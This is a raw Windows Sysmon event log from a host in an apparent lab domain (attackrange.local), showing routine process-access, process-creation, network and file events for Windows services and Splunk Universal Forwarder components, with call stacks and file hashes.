12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.329{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000011344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.459{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53719-false10.0.1.12-8000- 10341000x800000000000000011373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.843{266CAFBE-669F-6064-8001-00000000AE01}60086024C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:07.671{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.671{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.672{266CAFBE-669F-6064-8001-00000000AE01}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.578{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA9CDD0A2404C2435177362B38B08BC3,SHA256=1E9408C2FD6727A88AA50CDBD2CB3E73855A6074CD6E1C6533ECAFB1D28ADFB9,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000011363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.156{266CAFBE-669F-6064-7F01-00000000AE01}51446224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:07.000{266CAFBE-669F-6064-7F01-00000000AE01}5144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.593{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FB6FC08696B2BFEC602FCEB50B23C8E,SHA256=9D32B0B6C8C4FC3160B1762A144152A1554063C0E757AB8A1F616EF84225A8EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:08.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.
